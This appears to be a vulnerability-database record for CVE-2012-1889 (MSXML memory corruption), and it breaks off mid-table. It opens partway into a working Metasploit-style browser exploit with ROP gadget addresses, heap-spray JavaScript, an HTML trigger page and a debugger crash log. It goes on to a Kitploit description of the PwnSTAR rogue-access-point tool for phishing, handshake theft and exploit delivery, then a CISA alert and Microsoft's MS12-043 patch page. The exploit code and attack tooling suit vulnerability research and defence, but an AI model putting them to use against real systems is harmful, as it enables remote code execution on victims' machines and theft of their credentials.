Windows XP SP3\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\r\n return targets[2] #IE 7 on Windows Vista SP2\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n return targets[3] #IE 8 on Windows XP SP3\r\n elsif agent =~ /NT 6\\.[01]/ and agent =~ /MSIE 8/\r\n return targets[5] #IE 8 on Windows 7 SP1/Vista SP2\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 9/\r\n return targets[6] #IE 9 on Windows 7 SP1\r\n else\r\n return nil\r\n end\r\n end\r\n\r\n def ret(t)\r\n case t['Rop']\r\n when :msvcrt\r\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\r\n when :jre\r\n return [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\r\n end\r\n end\r\n\r\n def popret(t)\r\n case t['Rop']\r\n when :msvcrt\r\n return [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\r\n when :jre\r\n return [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\r\n end\r\n end\r\n\r\n def get_rop_chain(t)\r\n if t['RandomHeap']\r\n adjust = [ 0x0c0c0c0c ].pack(\"V\") # heap isn't filled with pointers to 0x0c0c0c0c\r\n adjust << ret(t)\r\n else\r\n adjust = ret(t)\r\n end\r\n\r\n adjust << popret(t)\r\n adjust << [ t['StackPivot'] ].pack(\"V\")\r\n adjust << ret(t) * 4 # first call to a \"ret\" because there is a good gadget in the stack :)\r\n\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})\r\n\r\n else\r\n print_status(\"Using JRE ROP\")\r\n rop = generate_rop_payload('java','',{'pivot'=>adjust})\r\n end\r\n\r\n return rop\r\n end\r\n\r\n def get_easy_spray(t, js_code, js_nops)\r\n\r\n spray = <<-JS\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n\r\n while (nops.length < 0x80000) nops += nops;\r\n\r\n var offset = nops.substring(0, #{t['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n heap_obj.gc();\r\n for (var z=1; z < 0x230; z++) {\r\n heap_obj.alloc(block);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n\r\n end\r\n\r\n\r\n def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)\r\n\r\n spray = <<-JS\r\n\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n var nops_90 = unescape(\"#{js_90_nops}\");\r\n var rop_chain = unescape(\"#{js_rop}\");\r\n\r\n while (nops.length < 0x80000) nops += nops;\r\n while (nops_90.length < 0x80000) nops_90 += nops_90;\r\n\r\n var offset = nops.substring(0, #{t['Offset']});\r\n var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);\r\n var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);\r\n\r\n\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n heap_obj.gc();\r\n for (var z=1; z < 0x230; z++) {\r\n heap_obj.alloc(block);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n\r\n end\r\n\r\n # Spray published by corelanc0d3r\r\n # Exploit writing tutorial part 11 : Heap Spraying Demystified\r\n # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\r\n def get_random_spray(t, js_rop, js_code, js_90_nops)\r\n\r\n spray = <<-JS\r\n\r\n function randomblock(blocksize)\r\n {\r\n var theblock = \"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n\r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n\r\n var heap_obj = new heapLib.ie(0x10000);\r\n\r\n var rop = unescape(\"#{js_rop}\");\r\n var code = unescape(\"#{js_code}\");\r\n var nops_90 = unescape(\"#{js_90_nops}\");\r\n\r\n while (nops_90.length < 0x80000) nops_90 += nops_90;\r\n\r\n var offset_length = #{t['RopChainOffset']};\r\n\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length - code.length);\r\n var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n my_target = get_target(agent)\r\n\r\n # Avoid the attack if the victim doesn't have the same setup we're targeting\r\n if my_target.nil?\r\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n p = payload.encoded\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\r\n js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n\r\n if not my_target['Rop'].nil?\r\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\r\n end\r\n\r\n if my_target['RandomHeap']\r\n js = get_random_spray(my_target, js_rop, js_code, js_90_nops)\r\n elsif not my_target['Rop'].nil?\r\n js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)\r\n else\r\n js = get_easy_spray(my_target, js_code, js_nops)\r\n end\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n object_id = rand_text_alpha(4)\r\n\r\n html = <<-EOS\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\r\n <script>\r\n var obj = document.getElementById('#{object_id}').object;\r\n var src = unescape(\"%u0c08%u0c0c\");\r\n while (src.length < 0x1002) src += src;\r\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\r\n src = src.substr(0, 0x1000 - 10);\r\n var pic = document.createElement(\"img\");\r\n pic.src = src;\r\n pic.nameProp;\r\n obj.definition(#{rand(999) + 1});\r\n </script>\r\n </body>\r\n </html>\r\n EOS\r\n\r\n html = html.gsub(/^ {4}/, '')\r\n\r\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n end\r\n\r\nend\r\n\r\n=begin\r\n(e34.358): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350\r\neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\r\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????\r\n\r\n\r\n0:008> r\r\neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\r\neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\r\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\r\n0:008> k\r\nChildEBP RetAddr \r\n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\r\n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\r\n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\r\n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\r\n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\r\n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\r\n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\r\n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\r\n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\r\n020bf590 633a77ff jscript!VAR::InvokeByName+0x135\r\n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\r\n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\r\n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\r\n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\r\n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\r\n020bf958 633891f1 jscript!CSession::Execute+0x175\r\n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\r\n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\r\n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\r\n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19186/"}], "kitploit": [{"lastseen": "2020-04-07T04:44:23", "bulletinFamily": "tools", "cvelist": ["CVE-2012-1889"], "description": "[  ](<https://1.bp.blogspot.com/-l8LdwNFonuI/U7sF6jc2TdI/AAAAAAAACx0/isP84ZjzHWY/s1600/PwnSTAR.png>)\n\n \n\n\nA bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables. Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3. \n\n## [ ](<https://github.com/SilverFoxx/PwnSTAR#usage>) Usage \n\n### [ ](<https://github.com/SilverFoxx/PwnSTAR#basic-menu>) Basic Menu \n \n \n 1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc\n no internet access given\n \n 2) Grab WPA handshake\n \n 3) Sniffing: provide internet access, then be MITM\n \n 4) Simple web server with dnsspoof: redirect the victim to your webpage\n \n 5) Karmetasploit\n \n 6) Browser_autopwn\n \n\n1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it. Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi \n\n2) Sometimes it is quicker to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target. Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap. \n\n3) Provides an open network, so you can sniff the victim's activities. \n\n4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details. Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof. DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3 \n\n5&amp;6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn. \n\n### [ ](<https://github.com/SilverFoxx/PwnSTAR#advanced-menu>) Advanced Menu \n \n \n a) Captive portals (phish/sniff)\n \n b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)\n \n c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)\n \n d) Java_jre17_jmxbean\n \n e) Choose another browser exploit\n \n\na) Uses iptables rules to route the clients. This is a fully functioning captive portal, and can track and block/allow multiple connections simultaneously. Avoids the problems of dns-spoofing. There are two built-in web options: \n\n1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given. \n\n2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead. \n\nb) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet. Includes a virgin pdf to which you can add your own payload. \n\nc&amp;d) Launches a couple of example browser exploits \n\ne) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control. \n\n \n\n\n** [ Download PwnStar ](<https://github.com/SilverFoxx/PwnSTAR>) **\n", "edition": 18, "modified": "2014-07-07T20:48:19", "published": "2014-07-07T20:48:19", "id": "KITPLOIT:201756244894943835", "href": "http://www.kitploit.com/2014/07/pwnstar-script-for-multi-attack-for-all.html", "title": "PwnStar - Script for multi attack (for all your fake-AP needs!)", "type": "kitploit", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:08:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Microsoft has released Security Advisory [2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) to address a vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0. This vulnerability may allow an attacker to execute arbitrary code if a user accesses specially crafted web pages using Internet Explorer. According to the advisory, this vulnerability is currently being exploited in the wild. \n \nUS-CERT encourages users and administrators to review Microsoft Security Advisory [2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>). The advisory indicates that the [workaround](<http://support.microsoft.com/kb/2719615>) does not correct the vulnerability, but it may help mitigate the risk against known attack vectors. \n \nUpdate: Additional information regarding CVE-2012-1889 can be found in the US-CERT Technical Alert TA12-174A. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2012/06/13/Microsoft-Releases-Security-Advisory-Microsoft-XML-Core-Services>); we'd welcome your feedback.\n", "modified": "2012-10-23T00:00:00", "published": "2012-06-13T00:00:00", "id": "CISA:7267E59351C96006CADADD4154FFBCB1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/06/13/Microsoft-Releases-Security-Advisory-Microsoft-XML-Core-Services", "type": "cisa", "title": "Microsoft Releases Security Advisory for Microsoft XML Core Services ", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:08", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-1889"], "description": "<html><body><p>Resolves a security vulnerability in Microsoft XML Core Services that could allow arbitrary code to run when you view a specially crafted webpage by using Windows Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\"><br/><a bookmark-id=\"appliestoproducts\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a></div><h2></h2><div class=\"kb-notice-section section\">Microsoft has rereleased security bulletin MS12-043. This security bulletin was previously released on July 10, 2012. This rereleased security bulletin includes Microsoft XML Core Services 5.0.</div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-043. To view the complete security bulletin, go to one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201208.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201208.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-043\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-043</a></div></li></ul>To have us fix this problem for you, go to the \"<a bookmark-id=\"fixitforme\" href=\"#fixitforme\" managed-link=\"\" target=\"\">Fix it for me</a>\" section.<br/><a class=\"bookmark\" id=\"fixitforme\"></a></div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\">The Fix it solution described in this section is not intended to be a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround option for some scenarios. <br/><br/>For more information about this workaround, go to the following Microsoft Security Advisory webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/security/advisory/2719615\" id=\"kb-link-4\" target=\"_self\">http://technet.microsoft.com/security/advisory/2719615</a></div>The advisory provides more information about the issue. This information includes the following: <ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround </li><li>How to manually apply the workaround </li></ul>Specifically, to see this information, expand the <strong class=\"uiterm\">Suggested actions</strong> section, and then expand the <strong class=\"uiterm\">Workaround</strong> section.<br/><br/><br/><span class=\"text-base\">Note</span> The following Fix it solutions do not apply to Windows 8 Consumer Preview or to Windows 8 Release Preview. <br/><h4 class=\"sbody-h4\">Fix it solution for MSXML version 3, MSXML version 4, and MSXML version 6</h4>To enable or disable these Fix it solutions, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading, click <strong class=\"uiterm\">Run</strong> in the<strong class=\"uiterm\"> File Download</strong> dialog box, and then follow the steps in the Fix it wizard. <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9811924\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9811925\" text=\"Download\"></div></span></td></tr></table></div><h4 class=\"sbody-h4\">Fix it solution for MSXML version 5</h4><br/>To enable or disable this fixit solution, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading, click <strong class=\"uiterm\">Run</strong> in the <strong class=\"uiterm\"> File Download</strong> dialog box, and then follow the steps in the Fix it wizard. <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9813081\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9813082\" text=\"Download\"></div></span></td></tr></table></div><span class=\"text-base\">Notes</span><ul class=\"sbody-free_list\"><li>These wizards may be in English only. However, the automatic fixes also work for other language versions of Windows. </li><li>If you are not on the computer that has the problem, you can save the automatic fix to a flash drive or to a CD and then run the fix on the computer that has the problem. </li><li>If you want to run a quiet installation of this Fix It solution, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Open a command line by using administrator credentials. </li><li>Type the following command, and then press Enter:<div class=\"indent\"><span class=\"sbody-userinput\">msiexec /i MicrosoftFixit50897.msi /quiet</span></div></li></ol><br/></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Frequently asked questions (FAQs) about this security update</h3><span class=\"text-base\">Q: Why was this bulletin revised on October 9, 2012?<br/></span><span class=\"text-base\">A: </span>Microsoft revised this bulletin to offer the rerelease of security update 2687497 and 2687627 and for XML Core Services 5.0 when it is installed together with Office SharePoint Server 2007 or Groove Server 2007. This revision addresses an issue with specific digital certificates that were generated by Microsoft without the correct time stamp attributes. For more information, see\u00a0<a href=\"http://technet.microsoft.com/security/advisory/2749655\" id=\"kb-link-5\" target=\"_self\">Microsoft Security Advisory 2749655</a>. <h3 class=\"sbody-h3\">How to deploy an application compatibility database across multiple computers</h3>To deploy an application compatibility database across multiple computers, you can use a system management solution such as Microsoft System Center Configuration Manager 2007 and then use the SDBInst.exe command-line tool to install the database. For more information about how to use SDBInst.exe, go to the following Microsoft TechNet webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/ee732408(v=ws.10).aspx\" id=\"kb-link-6\" target=\"_self\">Deploy an Application Compatibility Database by Using SDBInst</a></div>To deploy Microsoft Fix it 50897 to multiple computers by using SDBInst.exe, follow these steps.\u00a0<br/><br/><span class=\"text-base\">Note </span>For more information about command-line options for installing this fix, go to the following Microsoft Developer Network (MSDN) webpage: <div class=\"indent\"><a href=\"http://msdn.microsoft.com/en-us/library/aa372024(vs.85).aspx\" id=\"kb-link-7\" target=\"_self\">Standard Installer Command-Line Options</a></div><br/><ol class=\"sbody-num_list\"><li>Extract the CAB file from the Fix it package. To do this, type the following command at the command prompt: <div class=\"indent\"><span class=\"sbody-userinput\">msidb.exe -x CabFile -d MicrosoftFixit50897.msi</span></div><span class=\"text-base\">Note</span> Msidb.exe is part of Windows Installer Development Tools. For more information, go to the following Microsoft webpage: <div class=\"indent\"><a href=\"http://msdn.microsoft.com/en-us/library/windows/desktop/aa370083(v=vs.85).aspx\" id=\"kb-link-8\" target=\"_self\">http://msdn.microsoft.com/en-us/library/windows/desktop/aa370083(v=vs.85).aspx</a></div></li><li>Extract the SDB files from CabFile by using any cab extraction utility:<br/><div class=\"indent\"><span class=\"sbody-userinput\">extract.exe /E <strong class=\"sbody-strong\">CabFile</strong></span></div></li><li>Use <span class=\"text-base\">SDBInst</span> to apply the previously extracted .sdb files. To do this, type the following command at a command prompt: <div class=\"indent\"><span class=\"sbody-userinput\">SDBInst <strong class=\"sbody-strong\">Path_of_sdb_file</strong>\\<strong class=\"sbody-strong\">FileName</strong>.sdb</span></div><h4 class=\"sbody-h4\">File hash table</h4>The following table lists the thumbprints of the certificates that are used to sign the .sdb files. Verify the certificate thumbprint in this table against the certificate thumbprint that is indicated on the .sdb that you extracted. <br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">Hash information </th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml3_shim32.sdb</td><td class=\"sbody-td\">(SHA1 FC673C013DE2D40D03FD2EFC94D0B9965BAA3253)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml3_shim64.sdb</td><td class=\"sbody-td\">(SHA1 45431F80CE38BBB14FCB107E87F5DD22CCE203A1)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4_shim32.sdb</td><td class=\"sbody-td\">(SHA1 FE29173CAC4EFC68FF51E8EC04369044C4687AAF)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml5_shim32.sdb</td><td class=\"sbody-td\">(SHA1 33abdc0e4cfaa040cf0ff1a29bead2878fcd7673)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml5_shim64.sdb</td><td class=\"sbody-td\">(SHA1 c7c97f97f3895f69ba217908750ed61fa69390e9)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6_shim32.sdb</td><td class=\"sbody-td\">(SHA1 6E69B741CD4CEF05F5B9FFB47B748EE97264131C)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6_shim64.sdb</td><td class=\"sbody-td\">(SHA1 273BDFCBDBFE3D24B7F5D3586AF54BD0A93A6E63)</td></tr></table></div></li></ol></div><h2></h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-9\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-10\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-11\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-12\" target=\"_self\">International Support</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">More information about this security update</h3><h4 class=\"sbody-h4\">Known issues and additional information about this security update</h4>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed under each article link. <ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2721693\" id=\"kb-link-13\">2721693 </a> MS12-043: Description of the security update for XML Core Services 6.0: July 10, 2012</li><li><a href=\"http://bemis/2687497\" id=\"kb-link-14\" target=\"_self\">2687497</a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with Office SharePoint Server 2007 or Groove Server 2007: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2596856\" id=\"kb-link-15\">2596856 </a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with the 2007 Office system, Office Compatibility Pack, Office Word Viewer, Expression Web or Expression Web 2: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2687627\" id=\"kb-link-16\">2687627 </a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with Office 2003 Service Pack 3: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2721691\" id=\"kb-link-17\">2721691 </a> MS12-043: Description of the security update for XML Core Services 4.0: July 10, 2012<br/><br/>The following are the known issues in security update 2721691. For more information about these known issues, see security update 2721691.<br/><ul class=\"sbody-free_list\"><li>When you install this security update on a computer that is running Windows Vista or Windows Server 2008, you may have to restart the computer two times to complete the installation. </li><li>Security update 2721691 does not support the complete removal of MSXML 4.0. </li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2719985\" id=\"kb-link-18\">2719985 </a> MS12-043: Description of the security update for XML Core Services 3.0: July 10, 2012</li></ul><span></span><h4 class=\"sbody-h4\">File hash information</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml52007-kb2596856-fullfile-x86-glb.exe</td><td class=\"sbody-td\">1FC589D02269325D0081CD0134D2B086735646B7</td><td class=\"sbody-td\">BEB5A3AE3C64AF13B41ABFC3B96BDD329972AA589436275C9DA63ADC7525ABFB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml5s2007-kb2596679-fullfile-x64-glb.exe</td><td class=\"sbody-td\">AF1DDCFFFEECDA203EDE47567541AAE91EF7D2E1</td><td class=\"sbody-td\">C21B27EDF5EAD3B655E501B829C733FD4BD96CA3B1334CC6CD7E9FC05BA4342E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-ara.exe</td><td class=\"sbody-td\">907CCB1B028665AD425C0A3B77FB5CA75055DA0C</td><td class=\"sbody-td\">A59CFB7C5BBAC138795712A99278FE28D809D7083AE477139A04D4F753E65526</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-bgr.exe</td><td class=\"sbody-td\">37BCE03490A15D82B319BF93F59DD70E8378B31E</td><td class=\"sbody-td\">55AA4AB6044F8D5399FABA7F3869ED1877D4BDDE6783D11FA397A64850BE5FC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-chs.exe</td><td class=\"sbody-td\">D06332448D745BE4D21FC593FA666C695278DFD0</td><td class=\"sbody-td\">2168BF25E5D6349FDC4D6E66F3BB9BC8530B40A1EA139F48DDB727CCD67FE426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-cht.exe</td><td class=\"sbody-td\">8BDC6B3F6287469B049A63122050446AA4D9337D</td><td class=\"sbody-td\">FEA33552D3CA323A0F251D12F969E3D298F6BDE6E66CA1AE58E27EDD1921A8A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-csy.exe</td><td class=\"sbody-td\">A03A4D338135DA067D1272018A7C28CFB801C6A2</td><td class=\"sbody-td\">6CE5D0EE374B8FEFA860AF097121F5FA25F00D3601F6320E08E792CD19102933</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">office2003-kb2687627-fullfile-dan.exe</td><td class=\"sbody-td\">DF484593AE8F1441B4CCEF03D44F01D70491B487</td><td 